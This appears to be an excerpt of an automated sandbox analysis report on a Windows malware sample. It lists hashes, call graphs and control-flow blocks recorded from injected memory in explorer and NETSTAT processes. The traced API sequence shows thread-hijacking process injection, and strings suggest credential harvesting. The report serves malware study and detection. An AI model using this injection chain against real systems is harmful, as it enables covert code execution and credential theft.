                                                                                                                                                                            • API ID:
                                                                                                                                                                            • String ID: .$l$l$t
                                                                                                                                                                            • API String ID: 0-168566397
                                                                                                                                                                            • Opcode ID: 4d2417001e92a941b72e22f5172d980f9cfaeeee068a4ce0a3e94531502ff258
                                                                                                                                                                            • Instruction ID: 6f7a1155d4c8b2e5ab6b92a83acde172ddff17e36140a6ada6c56c5b13747480
                                                                                                                                                                            • Opcode Fuzzy Hash: 4d2417001e92a941b72e22f5172d980f9cfaeeee068a4ce0a3e94531502ff258
                                                                                                                                                                            • Instruction Fuzzy Hash: BA218B74A24B0D9BDB08EFA8E0447EEBBF0FB18304F50466ED409D3601DB78A5658B84
                                                                                                                                                                            Function 0FB3EFF2 Relevance: 5.1, Strings: 4, Instructions: 77COMMON
                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                            Strings
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000003.00000002.4143047548.000000000FA40000.00000040.00000001.00040000.00000000.sdmp, Offset: 0FA40000, based on PE: false
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_3_2_fa40000_explorer.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID:
                                                                                                                                                                            • String ID: auth$logi$pass$user
                                                                                                                                                                            • API String ID: 0-2393853802
                                                                                                                                                                            • Opcode ID: b1bb37e765f9f4b099c2fa6e409a2bcd00c7a79030895f352d0fc3307f2d087a
                                                                                                                                                                            • Instruction ID: 412921d95afb8746132d1935c2af04bd5bfb21f8581b30b72737e4433281d2a7
                                                                                                                                                                            • Opcode Fuzzy Hash: b1bb37e765f9f4b099c2fa6e409a2bcd00c7a79030895f352d0fc3307f2d087a
                                                                                                                                                                            • Instruction Fuzzy Hash: A121C070A24B0D8BCB05DF9DA8807EEB7E1EF88344F004659D80ADB245D7B5E9248BD2

                                                                                                                                                                            Execution Graph

                                                                                                                                                                            Execution Coverage:1.7%
                                                                                                                                                                            Dynamic/Decrypted Code Coverage:6.8%
                                                                                                                                                                            Signature Coverage:0%
                                                                                                                                                                            Total number of Nodes:620
                                                                                                                                                                            Total number of Limit Nodes:76
                                                                                                                                                                            execution_graph 102430 529040 102441 52bd00 102430->102441 102432 52915c 102433 52907b 102433->102432 102444 51ace0 102433->102444 102435 5290b1 102449 524e40 102435->102449 102437 5290e0 Sleep 102440 5290cd 102437->102440 102440->102432 102440->102437 102454 528c60 LdrLoadDll 102440->102454 102455 528e70 LdrLoadDll 102440->102455 102456 52a500 102441->102456 102443 52bd2d 102443->102433 102446 51ad04 102444->102446 102445 51ad0b 102445->102435 102446->102445 102447 51ad40 LdrLoadDll 102446->102447 102448 51ad57 102446->102448 102447->102448 102448->102435 102450 524e5a 102449->102450 102453 524e4e 102449->102453 102450->102440 102452 524fac 102452->102440 102453->102450 102463 5252c0 LdrLoadDll 102453->102463 102454->102440 102455->102440 102459 52af20 102456->102459 102458 52a51c NtAllocateVirtualMemory 102458->102443 102460 52af30 102459->102460 102462 52af52 102459->102462 102461 524e40 LdrLoadDll 102460->102461 102461->102462 102462->102458 102463->102452 102465 3182ad0 LdrInitializeThunk 102468 2dbcb84 102471 2dba042 102468->102471 102470 2dbcba5 102472 2dba06b 102471->102472 102473 2dba182 NtQueryInformationProcess 102472->102473 102488 2dba56c 102472->102488 102475 2dba1ba 102473->102475 102474 2dba1ef 102474->102470 102475->102474 102476 2dba2db 102475->102476 102477 2dba290 102475->102477 102478 2dba2fc NtSuspendThread 102476->102478 102500 2db9de2 NtCreateSection NtMapViewOfSection NtClose 102477->102500 102481 2dba30d 102478->102481 102482 2dba331 102478->102482 102480 2dba2cf 102480->102470 102481->102470 102484 2dba412 102482->102484 102491 2db9bb2 102482->102491 102485 2dba531 102484->102485 102487 2dba4a6 NtSetContextThread 102484->102487 102486 2dba552 NtResumeThread 102485->102486 102486->102488 102490 2dba4bd 102487->102490 102488->102470 102489 2dba51c NtQueueApcThread 102489->102485 102490->102485 102490->102489 102492 2db9bf7 102491->102492 102493 2db9c66 NtCreateSection 102492->102493 102494 2db9d4e 102493->102494 102495 2db9ca0 102493->102495 102494->102484 102496 2db9cc1 NtMapViewOfSection 102495->102496 102496->102494 102497 2db9d0c 102496->102497 102497->102494 102498 2db9d88 102497->102498 102499 2db9dc5 NtClose 102498->102499 102499->102484 102500->102480 102501 52f19d 102504 52b990 102501->102504 102505 52b9b6 102504->102505 102512 519d30 102505->102512 102507 52b9c2 102508 52b9e6 102507->102508 102520 518f30 102507->102520 102558 52a670 102508->102558 102561 519c80 102512->102561 102514 519d3d 102515 519d44 102514->102515 102573 519c20 102514->102573 102515->102507 102521 518f57 102520->102521 102970 51b1b0 102521->102970 102523 518f69 102974 51af00 102523->102974 102525 518f86 102533 518f8d 102525->102533 103045 51ae30 LdrLoadDll 102525->103045 102527 5190f2 102527->102508 102529 518ffc 102990 51f400 102529->102990 102531 519006 102531->102527 102532 52bf50 2 API calls 102531->102532 102534 51902a 102532->102534 102533->102527 102978 51f370 102533->102978 102535 52bf50 2 API calls 102534->102535 102536 51903b 102535->102536 102537 52bf50 2 API calls 102536->102537 102538 51904c 102537->102538 103002 51ca80 102538->103002 102540 519059 102541 524a40 8 API calls 102540->102541 102542 519066 102541->102542 102543 524a40 8 API calls 102542->102543 102544 519077 102543->102544 102545 5190a5 102544->102545 102546 519084 102544->102546 102548 524a40 8 API calls 102545->102548 103012 51d610 102546->103012 102555 5190c1 102548->102555 102551 5190e9 102552 518d00 23 API calls 102551->102552 102552->102527 102553 519092 103028 518d00 102553->103028 102555->102551 103046 51d6b0 LdrLoadDll NtClose LdrInitializeThunk LdrInitializeThunk 102555->103046 102559 52af20 LdrLoadDll 102558->102559 102560 52a68f 102559->102560 102562 519c93 102561->102562 102612 528b80 LdrLoadDll 102561->102612 102592 528a30 102562->102592 102565 519ca6 102565->102514 102566 519c9c 102566->102565 102595 52b270 102566->102595 102568 519ce3 102568->102565 102606 519aa0 102568->102606 102570 519d03 102613 519620 LdrLoadDll 102570->102613 102572 519d15 102572->102514 102574 519c3a 102573->102574 102575 52b560 LdrLoadDll 102573->102575 102948 52b560 102574->102948 102575->102574 102578 519c61 102580 51f170 102578->102580 102579 52b560 LdrLoadDll 102579->102578 102581 51f189 102580->102581 102952 51b030 102581->102952 102583 51f19c 102956 52a1a0 102583->102956 102586 519d55 102586->102507 102588 51f1c2 102589 51f1ed 102588->102589 102963 52a220 102588->102963 102591 52a450 2 API calls 102589->102591 102591->102586 102614 52a5c0 102592->102614 102596 52b289 102595->102596 102617 524a40 102596->102617 102598 52b2a1 102599 52b2aa 102598->102599 102656 52b0b0 102598->102656 102599->102568 102601 52b2be 102601->102599 102674 529ec0 102601->102674 102609 519aba 102606->102609 102926 517ea0 102606->102926 102608 519ac1 102608->102570 102609->102608 102939 518160 102609->102939 102612->102562 102613->102572 102615 52af20 LdrLoadDll 102614->102615 102616 528a45 102615->102616 102616->102566 102618 524a54 102617->102618 102619 524d75 102617->102619 102618->102619 102682 529c10 102618->102682 102619->102598 102622 524b63 102742 52a420 LdrLoadDll 102622->102742 102623 524b80 102685 52a320 102623->102685 102626 524b6d 102626->102598 102627 524ba7 102628 52bd80 2 API calls 102627->102628 102630 524bb3 102628->102630 102629 524d39 102632 52a450 2 API calls 102629->102632 102630->102626 102630->102629 102631 524d4f 102630->102631 102636 524c42 102630->102636 102751 524780 LdrLoadDll NtReadFile NtClose 102631->102751 102633 524d40 102632->102633 102633->102598 102635 524d62 102635->102598 102637 524ca9 102636->102637 102639 524c51 102636->102639 102637->102629 102638 524cbc 102637->102638 102744 52a2a0 102638->102744 102641 524c56 102639->102641 102642 524c6a 102639->102642 102743 524640 LdrLoadDll NtClose LdrInitializeThunk LdrInitializeThunk 102641->102743 102645 524c87 102642->102645 102646 524c6f 102642->102646 102645->102633 102700 524400 102645->102700 102688 5246e0 102646->102688 102648 524c60 102648->102598 102650 524d1c 102748 52a450 102650->102748 102651 524c7d 102651->102598 102654 524c9f 102654->102598 102655 524d28 102655->102598 102657 52b0c1 102656->102657 102658 52b0d3 102657->102658 102659 52bd00 2 API calls 102657->102659 102658->102601 102660 52b0f4 102659->102660 102769 524060 102660->102769 102662 52b140 102662->102601 102663 52b117 102663->102662 102664 524060 3 API calls 102663->102664 102666 52b139 102664->102666 102666->102662 102801 525380 102666->102801 102667 52b1ca 102668 52b1da 102667->102668 102895 52aec0 LdrLoadDll 102667->102895 102811 52ad30 102668->102811 102671 52b208 102890 529e80 102671->102890 102675 52af20 LdrLoadDll 102674->102675 102676 529edc 102675->102676 102920 3182c0a 102676->102920 102677 529ef7 102679 52bd80 102677->102679 102680 52b319 102679->102680 102923 52a630 102679->102923 102680->102568 102683 52af20 LdrLoadDll 102682->102683 102684 524b34 102683->102684 102684->102622 102684->102623 102684->102626 102686 52a33c NtCreateFile 102685->102686 102687 52af20 LdrLoadDll 102685->102687 102686->102627 102687->102686 102689 5246fc 102688->102689 102690 52a2a0 LdrLoadDll 102689->102690 102691 52471d 102690->102691 102692 524724 102691->102692 102693 524738 102691->102693 102694 52a450 2 API calls 102692->102694 102695 52a450 2 API calls 102693->102695 102696 52472d 102694->102696 102697 524741 102695->102697 102696->102651 102752 52bf90 LdrLoadDll RtlAllocateHeap 102697->102752 102699 52474c 102699->102651 102701 52444b 102700->102701 102702 52447e 102700->102702 102703 52a2a0 LdrLoadDll 102701->102703 102704 5245c9 102702->102704 102707 52449a 102702->102707 102705 524466 102703->102705 102706 52a2a0 LdrLoadDll 102704->102706 102708 52a450 2 API calls 102705->102708 102712 5245e4 102706->102712 102709 52a2a0 LdrLoadDll 102707->102709 102710 52446f 102708->102710 102711 5244b5 102709->102711 102710->102654 102714 5244d1 102711->102714 102715 5244bc 102711->102715 102765 52a2e0 LdrLoadDll 102712->102765 102718 5244d6 102714->102718 102719 5244ec 102714->102719 102717 52a450 2 API calls 102715->102717 102716 52461e 102720 52a450 2 API calls 102716->102720 102721 5244c5 102717->102721 102722 52a450 2 API calls 102718->102722 102728 5244f1 102719->102728 102753 52bf50 102719->102753 102723 524629 102720->102723 102721->102654 102724 5244df 102722->102724 102723->102654 102724->102654 102725 524503 102725->102654 102728->102725 102756 52a3d0 102728->102756 102729 524557 102730 52456e 102729->102730 102764 52a260 LdrLoadDll 102729->102764 102732 524575 102730->102732 102733 52458a 102730->102733 102735 52a450 2 API calls 102732->102735 102734 52a450 2 API calls 102733->102734 102736 524593 102734->102736 102735->102725 102737 5245bf 102736->102737 102759 52bb50 102736->102759 102737->102654 102739 5245aa 102740 52bd80 2 API calls 102739->102740 102741 5245b3 102740->102741 102741->102654 102742->102626 102743->102648 102745 524d04 102744->102745 102746 52af20 LdrLoadDll 102744->102746 102747 52a2e0 LdrLoadDll 102745->102747 102746->102745 102747->102650 102749 52af20 LdrLoadDll 102748->102749 102750 52a46c NtClose 102749->102750 102750->102655 102751->102635 102752->102699 102766 52a5f0 102753->102766 102755 52bf68 102755->102728 102757 52af20 LdrLoadDll 102756->102757 102758 52a3ec NtReadFile 102757->102758 102758->102729 102760 52bb74 102759->102760 102761 52bb5d 102759->102761 102760->102739 102761->102760 102762 52bf50 2 API calls 102761->102762 102763 52bb8b 102762->102763 102763->102739 102764->102730 102765->102716 102767 52af20 LdrLoadDll 102766->102767 102768 52a60c RtlAllocateHeap 102767->102768 102768->102755 102770 524071 102769->102770 102771 524079 102769->102771 102770->102663 102800 52434c 102771->102800 102896 52cef0 102771->102896 102773 5240cd 102774 52cef0 2 API calls 102773->102774 102778 5240d8 102774->102778 102775 524126 102777 52cef0 2 API calls 102775->102777 102781 52413a 102777->102781 102778->102775 102779 52d020 3 API calls 102778->102779 102907 52cf90 LdrLoadDll RtlAllocateHeap RtlFreeHeap 102778->102907 102779->102778 102780 524197 102782 52cef0 2 API calls 102780->102782 102781->102780 102901 52d020 102781->102901 102783 5241ad 102782->102783 102785 5241ea 102783->102785 102787 52d020 3 API calls 102783->102787 102786 52cef0 2 API calls 102785->102786 102788 5241f5 102786->102788 102787->102783 102789 52d020 3 API calls 102788->102789 102796 52422f 102788->102796 102789->102788 102791 524324 102909 52cf50 LdrLoadDll RtlFreeHeap 102791->102909 102793 52432e 102910 52cf50 LdrLoadDll RtlFreeHeap 102793->102910 102795 524338 102911 52cf50 LdrLoadDll RtlFreeHeap 102795->102911 102908 52cf50 LdrLoadDll RtlFreeHeap 102796->102908 102798 524342 102912 52cf50 LdrLoadDll RtlFreeHeap 102798->102912 102800->102663 102802 525391 102801->102802 102803 524a40 8 API calls 102802->102803 102805 5253a7 102803->102805 102804 5253fa 102804->102667 102805->102804 102806 5253e2 102805->102806 102807 5253f5 102805->102807 102808 52bd80 2 API calls 102806->102808 102809 52bd80 2 API calls 102807->102809 102810 5253e7 102808->102810 102809->102804 102810->102667 102913 52abf0 102811->102913 102814 52abf0 LdrLoadDll 102815 52ad4d 102814->102815 102816 52abf0 LdrLoadDll 102815->102816 102817 52ad56 102816->102817 102818 52abf0 LdrLoadDll 102817->102818 102819 52ad5f 102818->102819 102820 52abf0 LdrLoadDll 102819->102820 102821 52ad68 102820->102821 102822 52abf0 LdrLoadDll 102821->102822 102823 52ad71 102822->102823 102824 52abf0 LdrLoadDll 102823->102824 102825 52ad7d 102824->102825 102826 52abf0 LdrLoadDll 102825->102826 102827 52ad86 102826->102827 102828 52abf0 LdrLoadDll 102827->102828 102829 52ad8f 102828->102829 102830 52abf0 LdrLoadDll 102829->102830 102831 52ad98 102830->102831 102832 52abf0 LdrLoadDll 102831->102832 102833 52ada1 102832->102833 102834 52abf0 LdrLoadDll 102833->102834 102835 52adaa 102834->102835 102836 52abf0 LdrLoadDll 102835->102836 102837 52adb6 102836->102837 102838 52abf0 LdrLoadDll 102837->102838 102839 52adbf 102838->102839 102840 52abf0 LdrLoadDll 102839->102840 102841 52adc8 102840->102841 102842 52abf0 LdrLoadDll 102841->102842 102843 52add1 102842->102843 102844 52abf0 LdrLoadDll 102843->102844 102845 52adda 102844->102845 102846 52abf0 LdrLoadDll 102845->102846 102847 52ade3 102846->102847 102848 52abf0 LdrLoadDll 102847->102848 102849 52adef 102848->102849 102850 52abf0 LdrLoadDll 102849->102850 102851 52adf8 102850->102851 102852 52abf0 LdrLoadDll 102851->102852 102853 52ae01 102852->102853 102854 52abf0 LdrLoadDll 102853->102854 102855 52ae0a 102854->102855 102856 52abf0 LdrLoadDll 102855->102856 102857 52ae13 102856->102857 102858 52abf0 LdrLoadDll 102857->102858 102859 52ae1c 102858->102859 102860 52abf0 LdrLoadDll 102859->102860 102861 52ae28 102860->102861 102862 52abf0 LdrLoadDll 102861->102862 102863 52ae31 102862->102863 102864 52abf0 LdrLoadDll 102863->102864 102865 52ae3a 102864->102865 102866 52abf0 LdrLoadDll 102865->102866 102867 52ae43 102866->102867 102868 52abf0 LdrLoadDll 102867->102868 102869 52ae4c 102868->102869 102870 52abf0 LdrLoadDll 102869->102870 102871 52ae55 102870->102871 102872 52abf0 LdrLoadDll 102871->102872 102873 52ae61 102872->102873 102874 52abf0 LdrLoadDll 102873->102874 102875 52ae6a 102874->102875 102876 52abf0 LdrLoadDll 102875->102876 102877 52ae73 102876->102877 102878 52abf0 LdrLoadDll 102877->102878 102879 52ae7c 102878->102879 102880 52abf0 LdrLoadDll 102879->102880 102881 52ae85 102880->102881 102882 52abf0 LdrLoadDll 102881->102882 102883 52ae8e 102882->102883 102884 52abf0 LdrLoadDll 102883->102884 102885 52ae9a 102884->102885 102886 52abf0 LdrLoadDll 102885->102886 102887 52aea3 102886->102887 102888 52abf0 LdrLoadDll 102887->102888 102889 52aeac 102888->102889 102889->102671 102891 52af20 LdrLoadDll 102890->102891 102892 529e9c 102891->102892 102919 3182df0 LdrInitializeThunk 102892->102919 102893 529eb3 102893->102601 102895->102668 102897 52cf00 102896->102897 102898 52cf06 102896->102898 102897->102773 102899 52bf50 2 API calls 102898->102899 102900 52cf2c 102899->102900 102900->102773 102902 52cf90 102901->102902 102903 52bf50 2 API calls 102902->102903 102904 52cfed 102902->102904 102905 52cfca 102903->102905 102904->102781 102906 52bd80 2 API calls 102905->102906 102906->102904 102907->102778 102908->102791 102909->102793 102910->102795 102911->102798 102912->102800 102914 52ac0b 102913->102914 102915 524e40 LdrLoadDll 102914->102915 102916 52ac2b 102915->102916 102917 524e40 LdrLoadDll 102916->102917 102918 52acd7 102916->102918 102917->102918 102918->102814 102919->102893 102921 3182c1f LdrInitializeThunk 102920->102921 102922 3182c11 102920->102922 102921->102677 102922->102677 102924 52af20 LdrLoadDll 102923->102924 102925 52a64c RtlFreeHeap 102924->102925 102925->102680 102927 517eb0 102926->102927 102928 517eab 102926->102928 102929 52bd00 2 API calls 102927->102929 102928->102609 102932 517ed5 102929->102932 102930 517f38 102930->102609 102931 529e80 2 API calls 102931->102932 102932->102930 102932->102931 102933 517f3e 102932->102933 102938 52bd00 2 API calls 102932->102938 102942 52a580 102932->102942 102934 517f64 102933->102934 102936 52a580 2 API calls 102933->102936 102934->102609 102937 517f55 102936->102937 102937->102609 102938->102932 102940 51817e 102939->102940 102941 52a580 2 API calls 102939->102941 102940->102570 102941->102940 102943 52a59c 102942->102943 102944 52af20 LdrLoadDll 102942->102944 102947 3182c70 LdrInitializeThunk 102943->102947 102944->102943 102945 52a5b3 102945->102932 102947->102945 102949 52b583 102948->102949 102950 51ace0 LdrLoadDll 102949->102950 102951 519c4b 102950->102951 102951->102578 102951->102579 102953 51b053 102952->102953 102954 51b0d0 102953->102954 102968 529c50 LdrLoadDll 102953->102968 102954->102583 102957 52af20 LdrLoadDll 102956->102957 102958 51f1ab 102957->102958 102958->102586 102959 52a790 102958->102959 102960 52af20 LdrLoadDll 102959->102960 102961 52a7af LookupPrivilegeValueW 102960->102961 102961->102588 102964 52a23c 102963->102964 102965 52af20 LdrLoadDll 102963->102965 102969 3182ea0 LdrInitializeThunk 102964->102969 102965->102964 102966 52a25b 102966->102589 102968->102954 102969->102966 102971 51b1e0 102970->102971 102972 51b030 LdrLoadDll 102971->102972 102973 51b1f4 102972->102973 102973->102523 102975 51af24 102974->102975 103047 529c50 LdrLoadDll 102975->103047 102977 51af5e 102977->102525 102979 51f39c 102978->102979 102980 51b1b0 LdrLoadDll 102979->102980 102981 51f3ae 102980->102981 103048 51f280 102981->103048 102984 51f3e1 102988 52a450 2 API calls 102984->102988 102989 51f3f2 102984->102989 102985 51f3c9 102986 51f3d4 102985->102986 102987 52a450 2 API calls 102985->102987 102986->102529 102987->102986 102988->102989 102989->102529 102991 51f42c 102990->102991 103067 51b2a0 102991->103067 102993 51f43e 102994 51f280 3 API calls 102993->102994 102995 51f44f 102994->102995 102996 51f459 102995->102996 102997 51f471 102995->102997 102998 52a450 2 API calls 102996->102998 102999 51f464 102996->102999 103000 52a450 2 API calls 102997->103000 103001 51f482 102997->103001 102998->102999 102999->102531 103000->103001 103001->102531 103004 51ca88 103002->103004 103003 51ca95 103003->102540 103004->103003 103005 51af00 LdrLoadDll 103004->103005 103006 51cb3e 103005->103006 103007 51cb64 103006->103007 103008 51b030 LdrLoadDll 103006->103008 103007->102540 103009 51cb80 103008->103009 103010 524a40 8 API calls 103009->103010 103011 51cbd5 103010->103011 103011->102540 103013 51d636 103012->103013 103014 51b030 LdrLoadDll 103013->103014 103015 51d64a 103014->103015 103071 51d300 103015->103071 103017 51908b 103018 51cbf0 103017->103018 103019 51cc16 103018->103019 103020 51b030 LdrLoadDll 103019->103020 103021 51cc99 103019->103021 103020->103021 103022 51b030 LdrLoadDll 103021->103022 103023 51cd06 103022->103023 103024 51af00 LdrLoadDll 103023->103024 103025 51cd6f 103024->103025 103026 51b030 LdrLoadDll 103025->103026 103027 51ce1f 103026->103027 103027->102553 103031 518d14 103028->103031 103101 51f6c0 103028->103101 103030 518f25 103030->102508 103031->103030 103106 524390 103031->103106 103033 518d70 103033->103030 103109 518ab0 103033->103109 103036 52cef0 2 API calls 103037 518db2 103036->103037 103038 52d020 3 API calls 103037->103038 103043 518dc7 103038->103043 103039 517ea0 4 API calls 103039->103043 103042 51c7a0 18 API calls 103042->103043 103043->103030 103043->103039 103043->103042 103044 518160 2 API calls 103043->103044 103114 51f660 103043->103114 103118 51f070 21 API calls 103043->103118 103044->103043 103045->102533 103046->102551 103047->102977 103049 51f29a 103048->103049 103050 51f350 103048->103050 103051 51b030 LdrLoadDll 103049->103051 103050->102984 103050->102985 103052 51f2bc 103051->103052 103058 529f00 103052->103058 103054 51f2fe 103061 529f40 103054->103061 103057 52a450 2 API calls 103057->103050 103059 529f1c 103058->103059 103060 52af20 LdrLoadDll 103058->103060 103059->103054 103060->103059 103062 52af20 LdrLoadDll 103061->103062 103063 529f5c 103062->103063 103066 31835c0 LdrInitializeThunk 103063->103066 103064 51f344 103064->103057 103066->103064 103068 51b2c7 103067->103068 103069 51b030 LdrLoadDll 103068->103069 103070 51b303 103069->103070 103070->102993 103072 51d317 103071->103072 103080 51f700 103072->103080 103077 51d392 103077->103017 103079 51d3a5 103079->103017 103081 51f725 103080->103081 103093 5181a0 103081->103093 103083 51f749 103084 51d35f 103083->103084 103085 524a40 8 API calls 103083->103085 103087 52bd80 2 API calls 103083->103087 103100 51f540 LdrLoadDll CreateProcessInternalW LdrInitializeThunk 103083->103100 103088 52a6a0 103084->103088 103085->103083 103087->103083 103089 52a6bf CreateProcessInternalW 103088->103089 103090 52af20 LdrLoadDll 103088->103090 103091 51d38b 103089->103091 103090->103089 103091->103077 103092 52a260 LdrLoadDll 103091->103092 103092->103079 103094 51829f 103093->103094 103095 5181b5 103093->103095 103094->103083 103095->103094 103096 524a40 8 API calls 103095->103096 103097 518222 103096->103097 103098 52bd80 2 API calls 103097->103098 103099 518249 103097->103099 103098->103099 103099->103083 103100->103083 103102 524e40 LdrLoadDll 103101->103102 103103 51f6df 103102->103103 103104 51f6e6 SetErrorMode 103103->103104 103105 51f6ed 103103->103105 103104->103105 103105->103031 103119 51f490 103106->103119 103108 5243b6 103108->103033 103110 52bd00 2 API calls 103109->103110 103113 518ad5 103110->103113 103111 518cea 103111->103036 103113->103111 103139 529840 103113->103139 103115 51f673 103114->103115 103187 529e50 103115->103187 103118->103043 103120 51f4ad 103119->103120 103126 529f80 103120->103126 103123 51f4f5 103123->103108 103127 52af20 LdrLoadDll 103126->103127 103128 529f9c 103127->103128 103137 3182f30 LdrInitializeThunk 103128->103137 103129 51f4ee 103129->103123 103131 529fd0 103129->103131 103132 529fe5 103131->103132 103133 52af20 LdrLoadDll 103132->103133 103134 529fec 103133->103134 103138 3182d10 LdrInitializeThunk 103134->103138 103135 51f51e 103135->103108 103137->103129 103138->103135 103140 52bf50 2 API calls 103139->103140 103141 529857 103140->103141 103160 519310 103141->103160 103143 529872 103144 5298b0 103143->103144 103145 529899 103143->103145 103148 52bd00 2 API calls 103144->103148 103146 52bd80 2 API calls 103145->103146 103147 5298a6 103146->103147 103147->103111 103149 5298ea 103148->103149 103150 52bd00 2 API calls 103149->103150 103152 529903 103150->103152 103157 529ba4 103152->103157 103166 52bd40 LdrLoadDll 103152->103166 103153 529b89 103154 529b90 103153->103154 103153->103157 103155 52bd80 2 API calls 103154->103155 103156 529b9a 103155->103156 103156->103111 103158 52bd80 2 API calls 103157->103158 103159 529bf9 103158->103159 103159->103111 103161 519335 103160->103161 103162 51ace0 LdrLoadDll 103161->103162 103163 519368 103162->103163 103165 51938d 103163->103165 103167 51cf10 103163->103167 103165->103143 103166->103153 103168 51cf3c 103167->103168 103169 52a1a0 LdrLoadDll 103168->103169 103170 51cf55 103169->103170 103171 51cf5c 103170->103171 103178 52a1e0 103170->103178 103171->103165 103175 51cf97 103176 52a450 2 API calls 103175->103176 103177 51cfba 103176->103177 103177->103165 103179 52a1fc 103178->103179 103180 52af20 LdrLoadDll 103178->103180 103186 3182ca0 LdrInitializeThunk 103179->103186 103180->103179 103181 51cf7f 103181->103171 103183 52a7d0 103181->103183 103184 52af20 LdrLoadDll 103183->103184 103185 52a7ef 103184->103185 103185->103175 103186->103181 103188 52af20 LdrLoadDll 103187->103188 103189 529e6c 103188->103189 103192 3182dd0 LdrInitializeThunk 103189->103192 103190 51f69e 103190->103043 103192->103190

                                                                                                                                                                            Executed Functions

                                                                                                                                                                            Function 02DBA036 Relevance: 11.0, APIs: 5, Strings: 1, Instructions: 481nativeCOMMON
                                                                                                                                                                            Download Yara Rule

                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                            APIs
                                                                                                                                                                            • NtQueryInformationProcess.NTDLL ref: 02DBA19F
                                                                                                                                                                            Strings
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000005.00000002.4129812229.0000000002DB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02DB0000, based on PE: false
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_5_2_2db0000_NETSTAT.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: InformationProcessQuery
                                                                                                                                                                            • String ID: 0
                                                                                                                                                                            • API String ID: 1778838933-4108050209
                                                                                                                                                                            • Opcode ID: 7bc916a415ef614ffafa7f75d0ec115445e44d1b24a8fe03bb76e065ae57333e
                                                                                                                                                                            • Instruction ID: b87ed52d66c1098bcdf943a194ed9145e1a536fdabbbb5d693a2df5956c53ff2
                                                                                                                                                                            • Opcode Fuzzy Hash: 7bc916a415ef614ffafa7f75d0ec115445e44d1b24a8fe03bb76e065ae57333e
                                                                                                                                                                            • Instruction Fuzzy Hash: 94F13F70918A8CCFDBA5EF68C894AEEB7E1FF98304F40462AD44AD7250DF349A41CB41
                                                                                                                                                                            Function 02DB9BAF Relevance: 9.0, APIs: 3, Strings: 2, Instructions: 227nativeCOMMON
                                                                                                                                                                            Download Yara Rule

                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                            • Executed
                                                                                                                                                                            • Not Executed
                                                                                                                                                                            control_flow_graph 207 2db9baf-2db9bef 208 2db9bf7-2db9bfe 207->208 209 2db9bf2 call 2db9102 207->209 210 2db9c0c-2db9c9a call 2dbb942 * 2 NtCreateSection 208->210 211 2db9c00 208->211 209->208 217 2db9d5a-2db9d68 210->217 218 2db9ca0-2db9d0a call 2dbb942 NtMapViewOfSection 210->218 212 2db9c02-2db9c0a 211->212 212->210 212->212 221 2db9d0c-2db9d4c 218->221 222 2db9d52 218->222 224 2db9d69-2db9d6b 221->224 225 2db9d4e-2db9d4f 221->225 222->217 226 2db9d88-2db9ddc call 2dbcd62 NtClose 224->226 227 2db9d6d-2db9d72 224->227 225->222 229 2db9d74-2db9d86 call 2db9172 227->229 229->226
                                                                                                                                                                            APIs
                                                                                                                                                                            Strings
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000005.00000002.4129812229.0000000002DB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02DB0000, based on PE: false
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_5_2_2db0000_NETSTAT.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: Section$CloseCreateView
                                                                                                                                                                            • String ID: @$@
                                                                                                                                                                            • API String ID: 1133238012-149943524
                                                                                                                                                                            • Opcode ID: db7dcd85dc853400a789dde9de35cb8114d6383d98fd4a16120e7ccab82aa783
                                                                                                                                                                            • Instruction ID: c3c5d5c19d4b46769244aa4bae67bbdd88ad20b567e074ccec36f6fe7d1c4f8a
                                                                                                                                                                            • Opcode Fuzzy Hash: db7dcd85dc853400a789dde9de35cb8114d6383d98fd4a16120e7ccab82aa783
                                                                                                                                                                            • Instruction Fuzzy Hash: B1618170118B488FCB59DF58D8956EABBE0FF98314F50062EE58AC3251DB35D841CB86
                                                                                                                                                                            Function 02DB9BB2 Relevance: 7.2, APIs: 2, Strings: 2, Instructions: 171nativeCOMMON
                                                                                                                                                                            Download Yara Rule

                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                            • Executed
                                                                                                                                                                            • Not Executed
                                                                                                                                                                            control_flow_graph 268 2db9bb2-2db9bfe call 2db9102 271 2db9c0c-2db9c9a call 2dbb942 * 2 NtCreateSection 268->271 272 2db9c00 268->272 278 2db9d5a-2db9d68 271->278 279 2db9ca0-2db9d0a call 2dbb942 NtMapViewOfSection 271->279 273 2db9c02-2db9c0a 272->273 273->271 273->273 282 2db9d0c-2db9d4c 279->282 283 2db9d52 279->283 285 2db9d69-2db9d6b 282->285 286 2db9d4e-2db9d4f 282->286 283->278 287 2db9d88-2db9ddc call 2dbcd62 NtClose 285->287 288 2db9d6d-2db9d72 285->288 286->283 290 2db9d74-2db9d86 call 2db9172 288->290 290->287
                                                                                                                                                                            APIs
                                                                                                                                                                            Strings
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000005.00000002.4129812229.0000000002DB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02DB0000, based on PE: false
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_5_2_2db0000_NETSTAT.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: Section$CreateView
                                                                                                                                                                            • String ID: @$@
                                                                                                                                                                            • API String ID: 1585966358-149943524
                                                                                                                                                                            • Opcode ID: d19581801156352ea8c1368f03ac477e7143ca4b49b2be0ea58d8e64d299f740
                                                                                                                                                                            • Instruction ID: 99e979712881fa8a06f639151691372e02566f524262812395bd2658abb85e87
                                                                                                                                                                            • Opcode Fuzzy Hash: d19581801156352ea8c1368f03ac477e7143ca4b49b2be0ea58d8e64d299f740
                                                                                                                                                                            • Instruction Fuzzy Hash: 94517E70618B488FCB59DF18D8956AABBE0FF88314F50062EE98AC3651DF35D441CB86
